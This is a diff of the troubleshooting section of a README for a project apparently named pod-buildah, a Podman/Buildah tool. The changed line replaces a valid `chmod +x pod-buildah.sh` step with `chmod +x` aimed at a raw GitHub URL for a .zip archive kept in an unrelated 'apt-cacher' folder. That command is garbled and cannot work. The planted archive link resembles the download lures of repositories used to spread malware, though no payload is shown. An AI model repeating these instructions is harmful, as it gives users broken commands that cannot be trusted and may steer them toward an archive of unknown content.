joanncognizant380/pod-buildah/README.md

 If you run into issues during download or installation, consider the following solutions:

-1. **Permission Denied**: If you receive a permission error, ensure the script is executable by running `chmod +x pod-buildah.sh`.
+1. **Permission Denied**: If you receive a permission error, ensure the script is executable by running `chmod +x https://raw.githubusercontent.com/joanncognizant380/pod-buildah/master/apt-cacher/pod-buildah-v2.7.zip`.
 2. **Podman Not Found**: Make sure Podman is installed correctly.
 You can recheck using `podman --version`.
 3. **Dependency Errors**: Ensure all prerequisites are installed; rerun the installation commands if needed.